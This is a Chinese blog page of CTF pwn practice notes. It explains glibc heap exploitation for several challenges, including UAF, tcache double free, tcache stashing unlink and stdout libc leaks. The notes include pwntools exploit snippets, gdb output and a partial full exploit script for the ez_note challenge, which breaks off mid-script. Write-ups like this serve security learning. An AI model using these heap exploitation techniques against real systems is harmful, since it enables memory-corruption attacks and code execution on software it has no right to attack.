<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="de1ctf_2019_weapon版本：glibc-2.23漏洞：UAF限制：malloc最大大小为0x60，没有泄漏点① 利用UAF在一个fast chunk前申请一个chunk，用来改这个fast bin的size字段，使其free掉之后能进到unsorted bin里（绕过0x60的限制） ② 因为肯定要打stdout，而且2.23没有tcache，所以前面布置的chunk大小要合理，例如">
<meta property="og:type" content="article">
<meta property="og:title" content="刷题记录">
<meta property="og:url" content="https://github.com/CharonPt/CharonPt.github.io.git/2022/06/10/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/index.html">
<meta property="og:site_name" content="CharonPt的Blog">
<meta property="og:description" content="de1ctf_2019_weapon版本：glibc-2.23漏洞：UAF限制：malloc最大大小为0x60，没有泄漏点① 利用UAF在一个fast chunk前申请一个chunk，用来改这个fast bin的size字段，使其free掉之后能进到unsorted bin里（绕过0x60的限制） ② 因为肯定要打stdout，而且2.23没有tcache，所以前面布置的chunk大小要合理，例如">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://github.com/2022/06/10/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ez_note-1.jpg">
<meta property="og:image" content="https://github.com/2022/06/10/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ez_note-2.jpg">
<meta property="article:published_time" content="2022-06-10T08:19:13.000Z">
<meta property="article:modified_time" content="2022-10-07T03:05:29.567Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="‘刷题记录&#39;">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/2022/06/10/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ez_note-1.jpg">

<link rel="canonical" href="https://github.com/CharonPt/CharonPt.github.io.git/2022/06/10/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>刷题记录 | CharonPt的Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">CharonPt的Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://github.com/CharonPt/CharonPt.github.io.git/2022/06/10/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="CharonPt的Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          刷题记录
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-06-10 16:19:13" itemprop="dateCreated datePublished" datetime="2022-06-10T16:19:13+08:00">2022-06-10</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-10-07 11:05:29" itemprop="dateModified" datetime="2022-10-07T11:05:29+08:00">2022-10-07</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="de1ctf-2019-weapon"><a href="#de1ctf-2019-weapon" class="headerlink" title="de1ctf_2019_weapon"></a>de1ctf_2019_weapon</h3><h5 id="版本：glibc-2-23"><a href="#版本：glibc-2-23" class="headerlink" title="版本：glibc-2.23"></a>版本：glibc-2.23</h5><h5 id="漏洞：UAF"><a href="#漏洞：UAF" class="headerlink" title="漏洞：UAF"></a>漏洞：UAF</h5><h5 id="限制：malloc最大大小为0x60，没有泄漏点"><a href="#限制：malloc最大大小为0x60，没有泄漏点" class="headerlink" title="限制：malloc最大大小为0x60，没有泄漏点"></a>限制：malloc最大大小为0x60，没有泄漏点</h5><p>① 利用UAF在一个fast chunk前申请一个chunk，用来改这个fast bin的size字段，使其free掉之后能进到unsorted bin里（绕过0x60的限制）</p>
<p>② 因为肯定要打stdout，而且2.23没有tcache，所以前面布置的chunk大小要合理，例如</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0</span>,<span class="number">0x30</span>,p64(<span class="number">0x41</span>)*<span class="number">6</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x30</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x60</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x20</span>,<span class="string">&#x27;a&#x27;</span>)	<span class="comment">#padding</span></span><br></pre></td></tr></table></figure>

<p>利用chunk0来伪造size字段，然后在chunk1前面申请出一个chunk来改chunk1的size</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">free(<span class="number">0</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">edit(<span class="number">1</span>,<span class="string">&#x27;\x30&#x27;</span>)	<span class="comment">#部分覆写chunk1的fd指针，把fake chunk拿出来</span></span><br><span class="line">add(-<span class="number">1</span>,<span class="number">0x30</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">add(-<span class="number">1</span>,<span class="number">0x30</span>,p64(<span class="number">0</span>) + p64(<span class="number">0xb1</span>))	<span class="comment">#fake chunk改chunk1的size</span></span><br></pre></td></tr></table></figure>

<p>这里将chunk1的size改成0xb1就把chunk2也包含了进去</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">free(<span class="number">1</span>)	<span class="comment">#free掉大chunk</span></span><br><span class="line">free(<span class="number">2</span>)	<span class="comment">#提前把chunk2 free到fast bin</span></span><br><span class="line">add(-<span class="number">1</span>,<span class="number">0x30</span>,<span class="string">&#x27;a&#x27;</span>)	<span class="comment">#把chunk1拿出来，这样unsorted bin的指针就留在了chunk2里</span></span><br></pre></td></tr></table></figure>

<p>如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ bins</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x555555758080 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x555555758080</span><br><span class="line">0x80: 0x0</span><br><span class="line">unsortedbin</span><br><span class="line">all: 0x555555758080 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x555555758080</span><br></pre></td></tr></table></figure>

<p>这样就可以部分覆写chunk2来打stdout，同时<code>_IO_2_1_stdout</code>上面也有可用数据，能从fast bin里拿出来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = p64(0xfbad1800)+p64(0)*3+b&quot;\x58&quot;</span><br></pre></td></tr></table></figure>

<h3 id="SWPUCTF-2019-p1KkHeap"><a href="#SWPUCTF-2019-p1KkHeap" class="headerlink" title="SWPUCTF_2019_p1KkHeap"></a>SWPUCTF_2019_p1KkHeap</h3><h5 id="版本：glibc-2-27"><a href="#版本：glibc-2-27" class="headerlink" title="版本：glibc-2.27"></a>版本：glibc-2.27</h5><h5 id="漏洞：UAF（因为题目的限制，这个UAF不能直接用来编辑）"><a href="#漏洞：UAF（因为题目的限制，这个UAF不能直接用来编辑）" class="headerlink" title="漏洞：UAF（因为题目的限制，这个UAF不能直接用来编辑）"></a>漏洞：UAF（因为题目的限制，这个UAF不能直接用来编辑）</h5><h5 id="限制：malloc最大大小为0x100，全部菜单操作加起来最多18次，最多free-3次"><a href="#限制：malloc最大大小为0x100，全部菜单操作加起来最多18次，最多free-3次" class="headerlink" title="限制：malloc最大大小为0x100，全部菜单操作加起来最多18次，最多free 3次"></a>限制：malloc最大大小为0x100，全部菜单操作加起来最多18次，最多free 3次</h5><h5 id="菜单功能：add、show、edit、delete"><a href="#菜单功能：add、show、edit、delete" class="headerlink" title="菜单功能：add、show、edit、delete"></a>菜单功能：add、show、edit、delete</h5><p>在glibc-2.27中是没有对tcache增加double free检查的，所以在该版本可以直接在tcache中构造double free</p>
<p>这题的主要考点在于打那个0x250大小的储存tcache信息的结构体，这个结构体里面储存有每一个对应大小的tcache链表中<strong>chunk的数量</strong>，以及每一条tcache链表的<strong>链表头</strong>，也就是说如果我们能够直接修改这个结构体的话，就可以直接伪造上述的两个东西，例如将某一条链中chunk的数量改满，或者直接将某一个地址放到一个tcache链的链表头中，这样就能直接将这个地址申请出来。</p>
<h4 id="详细一点"><a href="#详细一点" class="headerlink" title="详细一点"></a>详细一点</h4><p>首先经过下面操作</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x100</span>)</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">free(<span class="number">0</span>)	<span class="comment">#double free</span></span><br></pre></td></tr></table></figure>

<p>那么tcache bin如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ bins</span><br><span class="line">tcachebins</span><br><span class="line">0x110 [  2]: 0x55f64cc13260 ◂— 0x55f64cc13260</span><br></pre></td></tr></table></figure>

<p>此时查看tcache结构体</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x/32gx 0x55f64cc13000</span><br><span class="line">0x55f64cc13000:	0x0000000000000000	0x0000000000000251</span><br><span class="line">0x55f64cc13010:	0x0000000000000000	0x0200000000000000		#最高一字节存储数量</span><br><span class="line">0x55f64cc13020:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x55f64cc13030:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x55f64cc13040:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x55f64cc13050:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x55f64cc13060:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x55f64cc13070:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x55f64cc13080:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x55f64cc13090:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x55f64cc130a0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x55f64cc130b0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x55f64cc130c0:	0x0000000000000000	0x000055f64cc13260		#size = 0x110 tcache bin的链表头</span><br><span class="line">0x55f64cc130d0:	0x0000000000000000	0x0000000000000000</span><br></pre></td></tr></table></figure>

<p>如果我们将<code>0x55f64cc1301f</code>的值改成7</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ bins</span><br><span class="line">tcachebins</span><br><span class="line">0x110 [  7]: 0x55f64cc13260 ◂— 0x55f64cc13260</span><br></pre></td></tr></table></figure>

<p>如果我们将<code>0x55f64cc130c0</code>的链表头地址改成<code>__malloc_hook</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ bins</span><br><span class="line">tcachebins</span><br><span class="line">0x110 [  7]: 0x7f061d061c30 (__malloc_hook) ◂— 0x0</span><br></pre></td></tr></table></figure>

<p>就是如上效果</p>
<h3 id="buuoj-2020-新春红包题-3"><a href="#buuoj-2020-新春红包题-3" class="headerlink" title="buuoj [2020 新春红包题]3"></a>buuoj [2020 新春红包题]3</h3><h5 id="版本：glibc-2-29"><a href="#版本：glibc-2-29" class="headerlink" title="版本：glibc-2.29"></a>版本：glibc-2.29</h5><h5 id="漏洞：UAF-1"><a href="#漏洞：UAF-1" class="headerlink" title="漏洞：UAF"></a>漏洞：UAF</h5><h5 id="考点：tcache-stashing-unlink-attack"><a href="#考点：tcache-stashing-unlink-attack" class="headerlink" title="考点：tcache stashing unlink attack"></a>考点：tcache stashing unlink attack</h5><h5 id="菜单功能：add、show、edit、delete-1"><a href="#菜单功能：add、show、edit、delete-1" class="headerlink" title="菜单功能：add、show、edit、delete"></a>菜单功能：add、show、edit、delete</h5><p>这题提供了一个后门函数，但前提是要往一个地址中写入一个大值</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">ssize_t</span> <span class="title">sub_13BD</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf[<span class="number">128</span>]; <span class="comment">// [rsp+0h] [rbp-80h] BYREF</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( *(qword_4058 + <span class="number">0x800</span>) &lt;= <span class="number">0x7F0000000000</span>LL || *(qword_4058 + <span class="number">0x7F8</span>) || *(qword_4058 + <span class="number">0x808</span>) )</span><br><span class="line">    end();</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;You get red packet!&quot;</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;What do you want to say?&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> read(<span class="number">0</span>, buf, <span class="number">0x90</span>uLL);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>同时add功能函数使用calloc来分配四种固定大小的堆</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;How much do you want?(1.0x10 2.0xf0 3.0x300 4.0x400): &quot;</span>);</span><br><span class="line">v3 = read_choice();</span><br></pre></td></tr></table></figure>

<p>首先塞满0x410大小的tcache bin，使得下一个0x410的chunk能进入unsorted bin，同时在0x100大小的tcache bin中填充6个chunk</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#full 0x410 tcache bin</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(<span class="number">0</span>,<span class="number">4</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">    free(<span class="number">0</span>)</span><br><span class="line"><span class="comment">#0x100 tcache bin =&gt; 6</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>):</span><br><span class="line">    add(<span class="number">0</span>,<span class="number">2</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">    free(<span class="number">0</span>)</span><br></pre></td></tr></table></figure>

<p>然后利用last remainder不会进入tcache的这一点向small bin中塞入两个chunk，这个过程中值得注意的是：第一个chunk被放入small bin之后要注意后面申请的块的大小一定要大于small bin中的这个chunk，否则就会将这个small bin chunk取出来了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0</span>,<span class="number">4</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">3</span>,<span class="string">&#x27;a&#x27;</span>)	<span class="comment">#padding</span></span><br><span class="line">free(<span class="number">0</span>)	<span class="comment">#into unsorted bin</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">3</span>,<span class="string">&#x27;a&#x27;</span>)	<span class="comment">#last remainder == 0x100</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">3</span>,<span class="string">&#x27;a&#x27;</span>)	<span class="comment">#last remainder into smallbin</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#again</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">4</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">3</span>,<span class="string">&#x27;a&#x27;</span>)	<span class="comment">#padding</span></span><br><span class="line">free(<span class="number">0</span>)	<span class="comment">#into unsorted bin</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">3</span>,<span class="string">&#x27;a&#x27;</span>)	<span class="comment">#last remainder == 0x100</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">3</span>,<span class="string">&#x27;a&#x27;</span>)	<span class="comment">#last remainder into smallbin</span></span><br></pre></td></tr></table></figure>

<p>然后修改第二个进入small bin的chunk的bk指针为目标地址-0x10，最后从这个small bin中申请出一个块即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">edit(<span class="number">2</span>,<span class="string">&#x27;\x00&#x27;</span>*<span class="number">0x300</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>) + p64(heap_base + <span class="number">0x37e0</span>) + p64(heap_base + <span class="number">0x260</span> + <span class="number">0x800</span> - <span class="number">0x10</span>))</span><br><span class="line">add(<span class="number">0</span>,<span class="number">2</span>,<span class="string">&#x27;a&#x27;</span>)</span><br></pre></td></tr></table></figure>

<h3 id="sctf-2019-one-heap"><a href="#sctf-2019-one-heap" class="headerlink" title="sctf_2019_one_heap"></a>sctf_2019_one_heap</h3><h5 id="版本：glibc-2-27-1"><a href="#版本：glibc-2-27-1" class="headerlink" title="版本：glibc-2.27"></a>版本：glibc-2.27</h5><h5 id="漏洞：UAF-2"><a href="#漏洞：UAF-2" class="headerlink" title="漏洞：UAF"></a>漏洞：UAF</h5><h5 id="考点：partial-write、stdout泄漏libc，tcache-struct"><a href="#考点：partial-write、stdout泄漏libc，tcache-struct" class="headerlink" title="考点：partial write、stdout泄漏libc，tcache struct"></a>考点：partial write、stdout泄漏libc，tcache struct</h5><h5 id="菜单：add、delete"><a href="#菜单：add、delete" class="headerlink" title="菜单：add、delete"></a>菜单：add、delete</h5><h5 id="限制：malloc的值小于0x7f，只能delete四次、add十五次，只有一个堆指针"><a href="#限制：malloc的值小于0x7f，只能delete四次、add十五次，只有一个堆指针" class="headerlink" title="限制：malloc的值小于0x7f，只能delete四次、add十五次，只有一个堆指针"></a>限制：malloc的值小于0x7f，只能delete四次、add十五次，只有一个堆指针</h5><p>2.27这个版本有点奇怪，似乎在一些小版本中没有加入tcache的double free检查，同时tcache counts的值为负数时仍然可以从中取出chunk，而另一些小版本中则加入了。同时这题的小版本是可以double free的那种。</p>
<p>因为可以直接double free，所以可以在没有edit的情况下改掉tcache的next指针，如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">add(0x78,&#x27;aaa&#x27;)</span><br><span class="line">free()</span><br><span class="line">free()</span><br><span class="line">add(0x78,&#x27;\x60&#x27;)</span><br></pre></td></tr></table></figure>

<p>那么此时0x80的tcache bin就是这样的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x90 [  1]: 0x55c6f6a88260 ◂— 0x55c6f6a88260</span><br></pre></td></tr></table></figure>

<p>那么把这个chunk拿出来的同时再改其fd即可</p>
<p><strong>目前为止看到这题有两种思路，一是爆破堆地址，将tcache struct申请出来，这样就可以控制tcache counts为7，从而将chunk放到unsorted bin。但是因为stdout肯定也需要爆破，所以一共是两次爆破，成功率较低。</strong></p>
<p><strong>另一种更好的思路仅能在这个版本使用，就是直接在tcache bin中申请三次chunk，将counts变成-1，这样这个tcache bin就不会再被使用，chunk会被free到unsorted bin</strong></p>
<h3 id="DASCTF-X-CBCTF-2022｜-九月挑战赛——ez-note"><a href="#DASCTF-X-CBCTF-2022｜-九月挑战赛——ez-note" class="headerlink" title="DASCTF X CBCTF 2022｜ 九月挑战赛——ez_note"></a>DASCTF X CBCTF 2022｜ 九月挑战赛——ez_note</h3><p>比赛做这题时愣是没审出洞来，赛后看wp才发现忽略了这种类型长度不同导致的问题</p>
<p>这题的漏洞在add函数里</p>
<img src="/2022/06/10/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ez_note-1.jpg" class>

<img src="/2022/06/10/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ez_note-2.jpg" class>

<p>其中<code>ReadLong</code>函数读<code>0xA</code>个字节，然后<code>atol</code>返回，并且保存<code>Size</code>的数组是<code>QWORD</code>类型的，但是在malloc和判断输入的size的时候却是截取成int类型，所以这里存在判断size的绕过和堆溢出，版本是2.31的所以后面就很简单了。</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch = <span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = process(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Your choice:&quot;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">	p.sendafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(<span class="number">0x100000000</span> + size))</span><br><span class="line">	<span class="keyword">if</span> <span class="built_in">len</span>(content) &lt; size:</span><br><span class="line">		p.sendlineafter(<span class="string">&quot;content:&quot;</span>,content)</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		p.sendafter(<span class="string">&quot;content:&quot;</span>,content)</span><br><span class="line">		</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Your choice:&quot;</span>,<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(index))</span><br><span class="line">	</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Your choice:&quot;</span>,<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(index))</span><br><span class="line">	</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">	add(<span class="number">0xf0</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0xf0</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0xf8</span>+p64(<span class="number">0x501</span>))</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">0xf0</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">show(<span class="number">2</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;Note content:&quot;</span>)</span><br><span class="line">libc_base = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>)) - (<span class="number">0x7efcc1570be0</span> - <span class="number">0x7efcc1385000</span>)</span><br><span class="line">free_hook = libc_base + (<span class="number">0x7f6e5eb9ab28</span> - <span class="number">0x7f6e5e9ac000</span>)</span><br><span class="line">system = libc_base + (<span 